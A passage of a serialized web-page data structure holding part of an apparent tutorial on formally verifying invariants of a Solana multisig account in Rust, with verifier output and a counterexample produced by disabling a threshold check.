transactions) and the threshold should never be greater than the number of members (which would let nobody issue transactions).",{"type":28,"tag":29,"props":24303,"children":24304},{},[24305,24307,24311],{"type":33,"value":24306},"Unlike the previous example, we want to verify this in ",{"type":28,"tag":2583,"props":24308,"children":24309},{},[24310],{"type":33,"value":8968},{"type":33,"value":24312}," cases. I.e. any instruction that could mutate the multisig account.",{"type":28,"tag":29,"props":24314,"children":24315},{},[24316,24318,24322,24324,24329],{"type":33,"value":24317},"In this case, we want to model this as an ",{"type":28,"tag":2583,"props":24319,"children":24320},{},[24321],{"type":33,"value":21440},{"type":33,"value":24323}," on the ",{"type":28,"tag":98,"props":24325,"children":24327},{"className":24326},[],[24328],{"type":33,"value":22404},{"type":33,"value":24330}," account struct:",{"type":28,"tag":234,"props":24332,"children":24334},{"code":24333,"language":2651,"meta":7,"className":2652,"style":7},"#[account]\n#[derive(Clone, Debug)]\n#[invariant(\n    (self.threshold >= 1)\n    && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms {\n    pub threshold: u16,               // threshold for signatures\n    pub authority_index: u16,         // index to seed other authorities under this multisig\n    pub transaction_index: u32,       // look up and seed reference for transactions\n    pub ms_change_index: u32,         // the last executed/closed transaction\n    pub bump: u8,                     // bump for the multisig seed\n    pub create_key: Pubkey,           // random key(or not) used to seed the multisig pda\n    pub allow_external_execute: bool, // allow non-member keys to execute txs\n    pub keys: Vec\u003CPubkey>,            // keys of the members\n}\n",[24335],{"type":28,"tag":98,"props":24336,"children":24337},{"__ignoreMap":7},[24338,24345,24370,24377,24401,24452,24459,24478,24505,24532,24559,24586,24613,24640,24667,24702],{"type":28,"tag":116,"props":24339,"children":24340},{"class":245,"line":246},[24341],{"type":28,"tag":116,"props":24342,"children":24343},{"style":266},[24344],{"type":33,"value":20433},{"type":28,"tag":116,"props":24346,"children":24347},{"class":245,"line":256},[24348,24352,24357,24361,24366],{"type":28,"tag":116,"props":24349,"children":24350},{"style":266},[24351],{"type":33,"value":22500},{"type":28,"tag":116,"props":24353,"children":24354},{"style":339},[24355],{"type":33,"value":24356},"Clone",{"type":28,"tag":116,"props":24358,"children":24359},{"style":266},[24360],{"type":33,"value":825},{"type":28,"tag":116,"props":24362,"children":24363},{"style":339},[24364],{"type":33,"value":24365},"Debug",{"type":28,"tag":116,"props":24367,"children":24368},{"style":266},[24369],{"type":33,"value":19922},{"type":28,"tag":116,"props":24371,"children":24372},{"class":245,"line":293},[24373],{"type":28,"tag":116,"props":24374,"children":24375},{"style":266},[24376],{"type":33,"value":20441},{"type":28,"tag":116,"props":24378,"children":24379},{"class":245,"line":361},[24380,24385,24389,24393,24397],{"type":28,"tag":116,"props":24381,"children":24382},{"style":266},[24383],{"type":33,"value":24384},"    (self",{"type":28,"tag":116,"props":24386,"children":24387},{"style":370},[24388],{"type":33,"value":141},{"type":28,"tag":116,"props":24390,"children":24391},{"style":266},[24392],{"type":33,"value":20734},{"type":28,"tag":116,"props":24394,"children":24395},{"style":370},[24396],{"type":33,"value":9611},{"type":28,"tag":116,"props":24398,"children":24399},{"style":266},[24400],{"type":33,"value":20743},{"type":28,"tag":116,"props":24402,"children":24403},{"class":245,"line":387},[24404,24408,24412,24416,24420,24424,24428,24432,24436,24440,24444,24448],{"type":28,"tag":116,"props":24405,"children":24406},{"style":370},[24407],{"type":33,"value":15283},{"type":28,"tag":116,"props":24409,"children":24410},{"style":266},[24411],{"type":33,"value":20667},{"type":28,"tag":116,"props":24413,"children":24414},{"style":370},[24415],{"type":33,"value":141},{"type":28,"tag":116,"props":24417,"children":24418},{"style":266},[24419],{"type":33,"value":20734},{"type":28,"tag":116,"props":24421,"children":24422},{"style":376},[24423],{"type":33,"value":8513},{"type":28,"tag":116,"props":24425,"children":24426},{"style":339},[24427],{"type":33,"value":13397},{"type":28,"tag":116,"props":24429,"children":24430},{"style":370},[24431],{"type":33,"value":7869},{"type":28,"tag":116,"props":24433,"children":24434},{"style":266},[24435],{"type":33,"value":13463},{"type":28,"tag":116,"props":24437,"children":24438},{"style":370},[24439],{"type":33,"value":141},{"type":28,"tag":116,"props":24441,"children":24442},{"style":266},[24443],{"type":33,"value":20646},{"type":28,"tag":116,"props":24445,"children":24446},{"style":370},[24447],{"type":33,"value":141},{"type":28,"tag":116,"props":24449,"children":24450},{"style":266},[24451],{"type":33,"value":20795},{"type":28,"tag":116,"props":24453,"children":24454},{"class":245,"line":400},[24455],{"type":28,"tag":116,"props":24456,"children":24457},{"style":266},[24458],{"type":33,"value":19922},{"type":28,"tag":116,"props":24460,"children":24461},{"class":245,"line":614},[24462,24466,24470,24474],{"type":28,"tag":116,"props":24463,"children":24464},{"style":376},[24465],{"type":33,"value":13356},{"type":28,"tag":116,"props":24467,"children":24468},{"style":376},[24469],{"type":33,"value":20814},{"type":28,"tag":116,"props":24471,"children":24472},{"style":339},[24473],{"type":33,"value":20819},{"type":28,"tag":116,"props":24475,"children":24476},{"style":266},[24477],{"type":33,"value":1291},{"type":28,"tag":116,"props":24479,"children":24480},{"class":245,"line":631},[24481,24485,24489,24493,24497,24501],{"type":28,"tag":116,"props":24482,"children":24483},{"style":376},[24484],{"type":33,"value":20506},{"type":28,"tag":116,"props":24486,"children":24487},{"style":272},[24488],{"type":33,"value":20835},{"type":28,"tag":116,"props":24490,"children":24491},{"style":370},[24492],{"type":33,"value":4160},{"type":28,"tag":116,"props":24494,"children":24495},{"style":339},[24496],{"type":33,"value":20693},{"type":28,"tag":116,"props":24498,"children":24499},{"style":266},[24500],{"type":33,"value":20848},{"type":28,"tag":116,"props":24502,"children":24503},{"style":250},[24504],{"type":33,"value":20853},{"type":28,"tag":116,"props":24506,"children":24507},{"class":245,"line":665},[24508,24512,24516,24520,24524,24528],{"type":28,"tag":116,"props":24509,"children":24510},{"style":376},[24511],{"type":33,"value":20506},{"type":28,"tag":116,"props":24513,"children":24514},{"style":272},[24515],{"type":33,"value":20865},{"type":28,"tag":116,"props":24517,"children":24518},{"style":370},[24519],{"type":33,"value":4160},{"type":28,"tag":116,"props":24521,"children":24522},{"style":339},[24523],{"type":33,"value":20693},{"type":28,"tag":116,"props":24525,"children":24526},{"style":266},[24527],{"type":33,"value":20878},{"type":28,"tag":116,"props":24529,"children":24530},{"style":250},[24531],{"type":33,"value":20883},{"type":28,"tag":116,"props":24533,"children":24534},{"class":245,"line":713},[24535,24539,24543,24547,24551,24555],{"type":28,"tag":116,"props":24536,"children":24537},{"style":376},[24538],{"type":33,"value":20506},{"type":28,"tag":116,"props":24540,"children":24541},{"style":272},[24542],{"type":33,"value":20895},{"type":28,"tag":116,"props":24544,"children":24545},{"style":370},[24546],{"type":33,"value":4160},{"type":28,"tag":116,"props":24548,"children":24549},{"style":339},[24550],{"type":33,"value":17211},{"type":28,"tag":116,"props":24552,"children":24553},{"style":266},[24554],{"type":33,"value":20908},{"type":28,"tag":116,"props":24556,"children":24557},{"style":250},[24558],{"type":33,"value":20913},{"type":28,"tag":116,"props":24560,"children":24561},{"class":245,"line":750},[24562,24566,24570,24574,24578,24582],{"type":28,"tag":116,"props":24563,"children":24564},{"style":376},[24565],{"type":33,"value":20506},{"type":28,"tag":116,"props":24567,"children":24568},{"style":272},[24569],{"type":33,"value":20925},{"type":28,"tag":116,"props":24571,"children":24572},{"style":370},[24573],{"type":33,"value":4160},{"type":28,"tag":116,"props":24575,"children":24576},{"style":339},[24577],{"type":33,"value":17211},{"type":28,"tag":116,"props":24579,"children":24580},{"style":266},[24581],{"type":33,"value":20878},{"type":28,"tag":116,"props":24583,"children":24584},{"style":250},[24585],{"type":33,"value":20942},{"type":28,"tag":116,"props":24587,"children":24588},{"class":245,"line":779},[24589,24593,24597,24601,24605,24609],{"type":28,"tag":116,"props":24590,"children":24591},{"style":376},[24592],{"type":33,"value":20506},{"type":28,"tag":116,"props":24594,"children":24595},{"style":272},[24596],{"type":33,"value":20954},{"type":28,"tag":116,"props":24598,"children":24599},{"style":370},[24600],{"type":33,"value":4160},{"type":28,"tag":116,"props":24602,"children":24603},{"style":339},[24604],{"type":33,"value":14300},{"type":28,"tag":116,"props":24606,"children":24607},{"style":266},[24608],{"type":33,"value":20967},{"type":28,"tag":116,"props":24610,"children":24611},{"style":250},[24612],{"type":33,"value":20972},{"type":28,"tag":116,"props":24614,"children":24615},{"class":245,"line":796},[24616,24620,24624,24628,24632,24636],{"type":28,"tag":116,"props":24617,"children":24618},{"style":376},[24619],{"type":33,"value":20506},{"type":28,"tag":116,"props":24621,"children":24622},{"style":272},[24623],{"type":33,"value":20984},{"type":28,"tag":116,"props":24625,"children":24626},{"style":370},[24627],{"type":33,"value":4160},{"type":28,"tag":116,"props":24629,"children":24630},{"style":339},[24631],{"type":33,"value":20520},{"type":28,"tag":116,"props":24633,"children":24634},{"style":266},[24635],{"type":33,"value":20997},{"type":28,"tag":116,"props":24637,"children":24638},{"style":250},[24639],{"type":33,"value":21002},{"type":28,"tag":116,"props":24641,"children":24642},{"class":245,"line":847},[24643,24647,24651,24655,24659,24663],{"type":28,"tag":116,"props":24644,"children":24645},{"style":376},[24646],{"type":33,"value":20506},{"type":28,"tag":116,"props":24648,"children":24649},{"style":272},[24650],{"type":33,"value":21014},{"type":28,"tag":116,"props":24652,"children":24653},{"style":370},[24654],{"type":33,"value":4160},{"type":28,"tag":116,"props":24656,"children":24657},{"style":339},[24658],{"type":33,"value":11718},{"type":28,"tag":116,"props":24660,"children":24661},{"style":266},[24662],{"type":33,"value":825},{"type":28,"tag":116,"props":24664,"children":24665},{"style":250},[24666],{"type":33,"value":21031},{"type":28,"tag":116,"props":24668,"children":24669},{"class":245,"line":898},[24670,24674,24678,24682,24686,24690,24694,24698],{"type":28,"tag":116,"props":24671,"children":24672},{"style":376},[24673],{"type":33,"value":20506},{"type":28,"tag":116,"props":24675,"children":24676},{"style":272},[24677],{"type":33,"value":21043},{"type":28,"tag":116,"props":24679,"children":24680},{"style":370},[24681],{"type":33,"value":4160},{"type":28,"tag":116,"props":24683,"children":24684},{"style":339},[24685],{"type":33,"value":21052},{"type":28,"tag":116,"props":24687,"children":24688},{"style":266},[24689],{"type":33,"value":514},{"type":28,"tag":116,"props":24691,"children":24692},{"style":339},[24693],{"type":33,"value":21061},{"type":28,"tag":116,"props":24695,"children":24696},{"style":266},[24697],{"type":33,"value":21066},{"type":28,"tag":116,"props":24699,"children":24700},{"style":250},[24701],{"type":33,"value":21071},{"type":28,"tag":116,"props":24703,"children":24704},{"class":245,"line":907},[24705],{"type":28,"tag":116,"props":24706,"children":24707},{"style":266},[24708],{"type":33,"value":406},{"type":28,"tag":29,"props":24710,"children":24711},{},[24712,24714,24719],{"type":33,"value":24713},"Our verification framework will generate an invariant harness for each instruction. Instructions that can potentially modify the ",{"type":28,"tag":98,"props":24715,"children":24717},{"className":24716},[],[24718],{"type":33,"value":22404},{"type":33,"value":24720}," object will be checked to ensure that the invariant still holds after modification.",{"type":28,"tag":29,"props":24722,"children":24723},{},[24724,24726,24731],{"type":33,"value":24725},"Let's try this on the ",{"type":28,"tag":98,"props":24727,"children":24729},{"className":24728},[],[24730],{"type":33,"value":22483},{"type":33,"value":24732}," instruction that we've already seen:",{"type":28,"tag":234,"props":24734,"children":24736},{"code":24735},"VERIFICATION:- SUCCESSFUL\nVerification Time: 6.8006988s\n",[24737],{"type":28,"tag":98,"props":24738,"children":24739},{"__ignoreMap":7},[24740],{"type":33,"value":24735},{"type":28,"tag":29,"props":24742,"children":24743},{},[24744,24746,24751],{"type":33,"value":24745},"To ensure this is working, we can test by commenting out this check from ",{"type":28,"tag":98,"props":24747,"children":24749},{"className":24748},[],[24750],{"type":33,"value":22483},{"type":33,"value":4160},{"type":28,"tag":234,"props":24753,"children":24755},{"code":24754,"language":2651,"meta":7,"className":2652,"style":7},"// if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n//     return err!(MsError::InvalidThreshold);\n// }\n",[24756],{"type":28,"tag":98,"props":24757,"children":24758},{"__ignoreMap":7},[24759,24767,24775],{"type":28,"tag":116,"props":24760,"children":24761},{"class":245,"line":246},[24762],{"type":28,"tag":116,"props":24763,"children":24764},{"style":250},[24765],{"type":33,"value":24766},"// if usize::from(threshold) \u003C 1 || usize::from(threshold) > total_members {\n",{"type":28,"tag":116,"props":24768,"children":24769},{"class":245,"line":256},[24770],{"type":28,"tag":116,"props":24771,"children":24772},{"style":250},[24773],{"type":33,"value":24774},"//     return err!(MsError::InvalidThreshold);\n",{"type":28,"tag":116,"props":24776,"children":24777},{"class":245,"line":293},[24778],{"type":28,"tag":116,"props":24779,"children":24780},{"style":250},[24781],{"type":33,"value":24782},"// }\n",{"type":28,"tag":29,"props":24784,"children":24785},{},[24786],{"type":33,"value":24787},"And run again:",{"type":28,"tag":234,"props":24789,"children":24791},{"code":24790},"VERIFICATION:- FAILED\nVerification Time: 8.245743s\n",[24792],{"type":28,"tag":98,"props":24793,"children":24794},{"__ignoreMap":7},[24795],{"type":33,"value":24790},{"type":28,"tag":29,"props":24797,"children":24798},{},[24799],{"type":33,"value":24800},"We get the following counterexample:",{"type":28,"tag":234,"props":24802,"children":24804},{"code":24803,"language":2651,"meta":7,"className":2652,"style":7},"Account {\n    account: Ms {\n        threshold: 32768,\n        authority_index: 1,\n        transaction_index: 0,\n        ms_change_index: 0,\n        bump: 0,\n        create_key: ...,\n        allow_external_execute: false,\n        keys: SparseVec {\n            size: 5112,\n        },\n    },\n    info: AccountInfo { ... },\n}\n",[24805],{"type":28,"tag":98,"props":24806,"children":24807},{"__ignoreMap":7},[24808,24819,24839,24859,24879,24899,24919,24939,24959,24979,25000,25021,25029,25037,25067],{"type":28,"tag":116,"props":24809,"children":24810},{"class":245,"line":246},[24811,24815],{"type":28,"tag":116,"props":24812,"children":24813},{"style":339},[24814],{"type":33,"value":16807},{"type":28,"tag":116,"props":24816,"children":24817},{"style":266},[24818],{"type":33,"value":1291},{"type":28,"tag":116,"props":24820,"children":24821},{"class":245,"line":256},[24822,24827,24831,24835],{"type":28,"tag":116,"props":24823,"children":24824},{"style":272},[24825],{"type":33,"value":24826},"    account",{"type":28,"tag":116,"props":24828,"children":24829},{"style":370},[24830],{"type":33,"value":4160},{"type":28,"tag":116,"props":24832,"children":24833},{"style":339},[24834],{"type":33,"value":20819},{"type":28,"tag":116,"props":24836,"children":24837},{"style":266},[24838],{"type":33,"value":1291},{"type":28,"tag":116,"props":24840,"children":24841},{"class":245,"line":293},[24842,24846,24850,24855],{"type":28,"tag":116,"props":24843,"children":24844},{"style":272},[24845],{"type":33,"value":23485},{"type":28,"tag":116,"props":24847,"children":24848},{"style":370},[24849],{"type":33,"value":4160},{"type":28,"tag":116,"props":24851,"children":24852},{"style":350},[24853],{"type":33,"value":24854}," 32768",{"type":28,"tag":116,"props":24856,"children":24857},{"style":266},[24858],{"type":33,"value":3178},{"type":28,"tag":116,"props":24860,"children":24861},{"class":245,"line":361},[24862,24867,24871,24875],{"type":28,"tag":116,"props":24863,"children":24864},{"style":272},[24865],{"type":33,"value":24866},"        authority_index",{"type":28,"tag":116,"props":24868,"children":24869},{"style":370},[24870],{"type":33,"value":4160},{"type":28,"tag":116,"props":24872,"children":24873},{"style":350},[24874],{"type":33,"value":4192},{"type":28,"tag":116,"props":24876,"children":24877},{"style":266},[24878],{"type":33,"value":3178},{"type":28,"tag":116,"props":24880,"children":24881},{"class":245,"line":387},[24882,24887,24891,24895],{"type":28,"tag":116,"props":24883,"children":24884},{"style":272},[24885],{"type":33,"value":24886},"        transaction_index",{"type":28,"tag":116,"props":24888,"children":24889},{"style":370},[24890],{"type":33,"value":4160},{"type":28,"tag":116,"props":24892,"children":24893},{"style":350},[24894],{"type":33,"value":2718},{"type":28,"tag":116,"props":24896,"children":24897},{"style":266},[24898],{"type":33,"value":3178},{"type":28,"tag":116,"props":24900,"children":24901},{"class":245,"line":400},[24902,24907,24911,24915],{"type":28,"tag":116,"props":24903,"children":24904},{"style":272},[24905],{"type":33,"value":24906},"        ms_change_index",{"type":28,"tag":116,"props":24908,"children":24909},{"style":370},[24910],{"type":33,"value":4160},{"type":28,"tag":116,"props":24912,"children":24913},{"style":350},[24914],{"type":33,"value":2718},{"type":28,"tag":116,"props":24916,"children":24917},{"style":266},[24918],{"type":33,"value":3178},{"type":28,"tag":116,"props":24920,"children":24921},{"class":245,"line":614},[24922,24927,24931,24935],{"type":28,"tag":116,"props":24923,"children":24924},{"style":272},[24925],{"type":33,"value":24926},"        bump",{"type":28,"tag":116,"props":24928,"children":24929},{"style":370},[24930],{"type":33,"value":4160},{"type":28,"tag":116,"props":24932,"children":24933},{"style":350},[24934],{"type":33,"value":2718},{"type":28,"tag":116,"props":24936,"children":24937},{"style":266},[24938],{"type":33,"value":3178},{"type":28,"tag":116,"props":24940,"children":24941},{"class":245,"line":631},[24942,24946,24950,24955],{"type":28,"tag":116,"props":24943,"children":24944},{"style":272},[24945],{"type":33,"value":23497},{"type":28,"tag":116,"props":24947,"children":24948},{"style":370},[24949],{"type":33,"value":4160},{"type":28,"tag":116,"props":24951,"children":24952},{"style":370},[24953],{"type":33,"value":24954}," ...",{"type":28,"tag":116,"props":24956,"children":24957},{"style":266},[24958],{"type":33,"value":3178},{"type":28,"tag":116,"props":24960,"children":24961},{"class":245,"line":665},[24962,24967,24971,24975],{"type":28,"tag":116,"props":24963,"children":24964},{"style":272},[24965],{"type":33,"value":24966},"        allow_external_execute",{"type":28,"tag":116,"props":24968,"children":24969},{"style":370},[24970],{"type":33,"value":4160},{"type":28,"tag":116,"props":24972,"children":24973},{"style":376},[24974],{"type":33,"value":1022},{"type":28,"tag":116,"props":24976,"children":24977},{"style":266},[24978],{"type":33,"value":3178},{"type":28,"tag":116,"props":24980,"children":24981},{"class":245,"line":713},[24982,24987,24991,24996],{"type":28,"tag":116,"props":24983,"children":24984},{"style":272},[24985],{"type":33,"value":24986},"        keys",{"type":28,"tag":116,"props":24988,"children":24989},{"style":370},[24990],{"type":33,"value":4160},{"type":28,"tag":116,"props":24992,"children":24993},{"style":339},[24994],{"type":33,"value":24995}," SparseVec",{"type":28,"tag":116,"props":24997,"children":24998},{"style":266},[24999],{"type":33,"value":1291},{"type":28,"tag":116,"props":25001,"children":25002},{"class":245,"line":750},[25003,25008,25012,25017],{"type":28,"tag":116,"props":25004,"children":25005},{"style":272},[25006],{"type":33,"value":25007},"            size",{"type":28,"tag":116,"props":25009,"children":25010},{"style":370},[25011],{"type":33,"value":4160},{"type":28,"tag":116,"props":25013,"children":25014},{"style":350},[25015],{"type":33,"value":25016}," 5112",{"type":28,"tag":116,"props":25018,"children":25019},{"style":266},[25020],{"type":33,"value":3178},{"type":28,"tag":116,"props":25022,"children":25023},{"class":245,"line":779},[25024],{"type":28,"tag":116,"props":25025,"children":25026},{"style":266},[25027],{"type":33,"value":25028},"        },\n",{"type":28,"tag":116,"props":25030,"children":25031},{"class":245,"line":796},[25032],{"type":28,"tag":116,"props":25033,"children":25034},{"style":266},[25035],{"type":33,"value":25036},"    },\n",{"type":28,"tag":116,"props":25038,"children":25039},{"class":245,"line":847},[25040,25045,25049,25054,25058,25062],{"type":28,"tag":116,"props":25041,"children":25042},{"style":272},[25043],{"type":33,"value":25044},"    info",{"type":28,"tag":116,"props":25046,"children":25047},{"style":370},[25048],{"type":33,"value":4160},{"type":28,"tag":116,"props":25050,"children":25051},{"style":339},[25052],{"type":33,"value":25053}," AccountInfo",{"type":28,"tag":116,"props":25055,"children":25056},{"style":266},[25057],{"type":33,"value":9254},{"type":28,"tag":116,"props":25059,"children":25060},{"style":370},[25061],{"type":33,"value":9259},{"type":28,"tag":116,"props":25063,"children":25064},{"style":266},[25065],{"type":33,"value":25066}," },\n",{"type":28,"tag":116,"props":25068,"children":25069},{"class":245,"line":898},[25070],{"type":28,"tag":116,"props":25071,"children":25072},{"style":266},[25073],{"type":33,"value":406},{"type":28,"tag":29,"props":25075,"children":25076},{},[25077,25079,25084,25086,25091],{"type":33,"value":25078},"Here we see that the ",{"type":28,"tag":98,"props":25080,"children":25082},{"className":25081},[],[25083],{"type":33,"value":22412},{"type":33,"value":25085}," of the newly created ",{"type":28,"tag":98,"props":25087,"children":25089},{"className":25088},[],[25090],{"type":33,"value":22404},{"type":33,"value":25092}," account is larger than the number of keys (5112) which breaks our struct invariant.",{"type":28,"tag":75,"props":25094,"children":25096},{"id":25095},"verify-requirements-to-remove-a-member",[25097],{"type":33,"value":22442},{"type":28,"tag":29,"props":25099,"children":25100},{},[25101,25103,25108,25109,25114,25116,25122],{"type":33,"value":25102},"Now that we've seen both ",{"type":28,"tag":98,"props":25104,"children":25106},{"className":25105},[],[25107],{"type":33,"value":19818},{"type":33,"value":10659},{"type":28,"tag":98,"props":25110,"children":25112},{"className":25111},[],[25113],{"type":33,"value":21440},{"type":33,"value":25115}," let's take a look at the ",{"type":28,"tag":98,"props":25117,"children":25119},{"className":25118},[],[25120],{"type":33,"value":25121},"remove_member",{"type":33,"value":25123}," function:",{"type":28,"tag":234,"props":25125,"children":25127},{"code":25126,"language":2651,"meta":7,"className":2652,"style":7},"#[derive(Accounts, Debug)]\npub struct MsAuth\u003C'info> {\n    #[account(mut)]\n    multisig: Box\u003CAccount\u003C'info, Ms>>,\n    #[account(\n        mut,\n        seeds = [\n            b\"squad\",\n            multisig.create_key.as_ref(),\n            b\"multisig\"\n        ], bump = multisig.bump\n    )]\n    pub multisig_auth: Signer\u003C'info>,\n}\n\npub fn remove_member(ctx: Context\u003CMsAuth>, old_member: Pubkey) -> Result\u003C()> {\n    // if there is only one key in this multisig, reject the removal\n    if ctx.accounts.multisig.keys.len() == 1 {\n        return err!(MsError::CannotRemoveSoloMember);\n    }\n    ctx.accounts.multisig.remove_member(old_member)?;\n\n    // if the number of keys is now less than the threshold, adjust it\n    if ctx.accounts.multisig.keys.len() \u003C usize::from(ctx.accounts.multisig.threshold) {\n        let new_threshold: u16 = ctx.accounts.multisig.keys.len().try_into().unwrap();\n        ctx.accounts.multisig.change_threshold(new_threshold)?;\n    }\n    let new_index = ctx.accounts.multisig.transaction_index;\n    ctx.accounts.multisig.set_change_index(new_index)\n}\n",[25128],{"type":28,"tag":98,"props":25129,"children":25130},{"__ignoreMap":7},[25131,25154,25182,25197,25242,25249,25261,25277,25289,25315,25323,25352,25359,25391,25398,25405,25479,25487,25547,25579,25586,25637,25644,25652,25745,25834,25888,25895,25940,25985],{"type":28,"tag":116,"props":25132,"children":25133},{"class":245,"line":246},[25134,25138,25142,25146,25150],{"type":28,"tag":116,"props":25135,"children":25136},{"style":266},[25137],{"type":33,"value":22500},{"type":28,"tag":116,"props":25139,"children":25140},{"style":339},[25141],{"type":33,"value":22505},{"type":28,"tag":116,"props":25143,"children":25144},{"style":266},[25145],{"type":33,"value":825},{"type":28,"tag":116,"props":25147,"children":25148},{"style":339},[25149],{"type":33,"value":24365},{"type":28,"tag":116,"props":25151,"children":25152},{"style":266},[25153],{"type":33,"value":19922},{"type":28,"tag":116,"props":25155,"children":25156},{"class":245,"line":256},[25157,25161,25165,25170,25174,25178],{"type":28,"tag":116,"props":25158,"children":25159},{"style":376},[25160],{"type":33,"value":13356},{"type":28,"tag":116,"props":25162,"children":25163},{"style":376},[25164],{"type":33,"value":20814},{"type":28,"tag":116,"props":25166,"children":25167},{"style":339},[25168],{"type":33,"value":25169}," MsAuth",{"type":28,"tag":116,"props":25171,"children":25172},{"style":266},[25173],{"type":33,"value":22585},{"type":28,"tag":116,"props":25175,"children":25176},{"style":339},[25177],{"type":33,"value":22590},{"type":28,"tag":116,"props":25179,"children":25180},{"style":266},[25181],{"type":33,"value":6952},{"type":28,"tag":116,"props":25183,"children":25184},{"class":245,"line":293},[25185,25189,25193],{"type":28,"tag":116,"props":25186,"children":25187},{"style":266},[25188],{"type":33,"value":22792},{"type":28,"tag":116,"props":25190,"children":25191},{"style":376},[25192],{"type":33,"value":3394},{"type":28,"tag":116,"props":25194,"children":25195},{"style":266},[25196],{"type":33,"value":19922},{"type":28,"tag":116,"props":25198,"children":25199},{"class":245,"line":361},[25200,25205,25209,25214,25218,25222,25226,25230,25234,25238],{"type":28,"tag":116,"props":25201,"children":25202},{"style":272},[25203],{"type":33,"value":25204},"    multisig",{"type":28,"tag":116,"props":25206,"children":25207},{"style":370},[25208],{"type":33,"value":4160},{"type":28,"tag":116,"props":25210,"children":25211},{"style":339},[25212],{"type":33,"value":25213}," Box",{"type":28,"tag":116,"props":25215,"children":25216},{"style":266},[25217],{"type":33,"value":514},{"type":28,"tag":116,"props":25219,"children":25220},{"style":339},[25221],{"type":33,"value":16807},{"type":28,"tag":116,"props":25223,"children":25224},{"style":266},[25225],{"type":33,"value":22585},{"type":28,"tag":116,"props":25227,"children":25228},{"style":339},[25229],{"type":33,"value":22590},{"type":28,"tag":116,"props":25231,"children":25232},{"style":266},[25233],{"type":33,"value":825},{"type":28,"tag":116,"props":25235,"children":25236},{"style":339},[25237],{"type":33,"value":22404},{"type":28,"tag":116,"props":25239,"children":25240},{"style":266},[25241],{"type":33,"value":6623},{"type":28,"tag":116,"props":25243,"children":25244},{"class":245,"line":387},[25245],{"type":28,"tag":116,"props":25246,"children":25247},{"style":266},[25248],{"type":33,"value":22602},{"type":28,"tag":116,"props":25250,"children":25251},{"class":245,"line":400},[25252,25257],{"type":28,"tag":116,"props":25253,"children":25254},{"style":376},[25255],{"type":33,"value":25256},"        mut",{"type":28,"tag":116,"props":25258,"children":25259},{"style":266},[25260],{"type":33,"value":3178},{"type":28,"tag":116,"props":25262,"children":25263},{"class":245,"line":614},[25264,25268,25272],{"type":28,"tag":116,"props":25265,"children":25266},{"style":266},[25267],{"type":33,"value":22686},{"type":28,"tag":116,"props":25269,"children":25270},{"style":370},[25271],{"type":33,"value":373},{"type":28,"tag":116,"props":25273,"children":25274},{"style":266},[25275],{"type":33,"value":25276}," [\n",{"type":28,"tag":116,"props":25278,"children":25279},{"class":245,"line":631},[25280,25285],{"type":28,"tag":116,"props":25281,"children":25282},{"style":563},[25283],{"type":33,"value":25284},"            b\"squad\"",{"type":28,"tag":116,"props":25286,"children":25287},{"style":266},[25288],{"type":33,"value":3178},{"type":28,"tag":116,"props":25290,"children":25291},{"class":245,"line":665},[25292,25297,25301,25306,25310],{"type":28,"tag":116,"props":25293,"children":25294},{"style":266},[25295],{"type":33,"value":25296},"            multisig",{"type":28,"tag":116,"props":25298,"children":25299},{"style":370},[25300],{"type":33,"value":141},{"type":28,"tag":116,"props":25302,"children":25303},{"style":266},[25304],{"type":33,"value":25305},"create_key",{"type":28,"tag":116,"props":25307,"children":25308},{"style":370},[25309],{"type":33,"value":141},{"type":28,"tag":116,"props":25311,"children":25312},{"style":266},[25313],{"type":33,"value":25314},"as_ref(),\n",{"type":28,"tag":116,"props":25316,"children":25317},{"class":245,"line":713},[25318],{"type":28,"tag":116,"props":25319,"children":25320},{"style":563},[25321],{"type":33,"value":25322},"            b\"multisig\"\n",{"type":28,"tag":116,"props":25324,"children":25325},{"class":245,"line":750},[25326,25331,25336,25340,25344,25348],{"type":28,"tag":116,"props":25327,"children":25328},{"style":266},[25329],{"type":33,"value":25330},"        ], ",{"type":28,"tag":116,"props":25332,"children":25333},{"style":272},[25334],{"type":33,"value":25335},"bump",{"type":28,"tag":116,"props":25337,"children":25338},{"style":370},[25339],{"type":33,"value":2226},{"type":28,"tag":116,"props":25341,"children":25342},{"style":272},[25343],{"type":33,"value":22748},{"type":28,"tag":116,"props":25345,"children":25346},{"style":370},[25347],{"type":33,"value":141},{"type":28,"tag":116,"props":25349,"children":25350},{"style":266},[25351],{"type":33,"value":22728},{"type":28,"tag":116,"props":25353,"children":25354},{"class":245,"line":779},[25355],{"type":28,"tag":116,"props":25356,"children":25357},{"style":266},[25358],{"type":33,"value":22736},{"type":28,"tag":116,"props":25360,"children":25361},{"class":245,"line":796},[25362,25366,25371,25375,25379,25383,25387],{"type":28,"tag":116,"props":25363,"children":25364},{"style":376},[25365],{"type":33,"value":20506},{"type":28,"tag":116,"props":25367,"children":25368},{"style":272},[25369],{"type":33,"value":25370}," multisig_auth",{"type":28,"tag":116,"props":25372,"children":25373},{"style":370},[25374],{"type":33,"value":4160},{"type":28,"tag":116,"props":25376,"children":25377},{"style":339},[25378],{"type":33,"value":22821},{"type":28,"tag":116,"props":25380,"children":25381},{"style":266},[25382],{"type":33,"value":22585},{"type":28,"tag":116,"props":25384,"children":25385},{"style":339},[25386],{"type":33,"value":22590},{"type":28,"tag":116,"props":25388,"children":25389},{"style":266},[25390],{"type":33,"value":5809},{"type":28,"tag":116,"props":25392,"children":25393},{"class":245,"line":847},[25394],{"type":28,"tag":116,"props":25395,"children":25396},{"style":266},[25397],{"type":33,"value":406},{"type":28,"tag":116,"props":25399,"children":25400},{"class":245,"line":898},[25401],{"type":28,"tag":116,"props":25402,"children":25403},{"emptyLinePlaceholder":19},[25404],{"type":33,"value":1044},{"type":28,"tag":116,"props":25406,"children":25407},{"class":245,"line":907},[25408,25412,25416,25421,25425,25429,25433,25437,25441,25446,25450,25455,25459,25463,25467,25471,25475],{"type":28,"tag":116,"props":25409,"children":25410},{"style":376},[25411],{"type":33,"value":13356},{"type":28,"tag":116,"props":25413,"children":25414},{"style":376},[25415],{"type":33,"value":13361},{"type":28,"tag":116,"props":25417,"children":25418},{"style":282},[25419],{"type":33,"value":25420}," 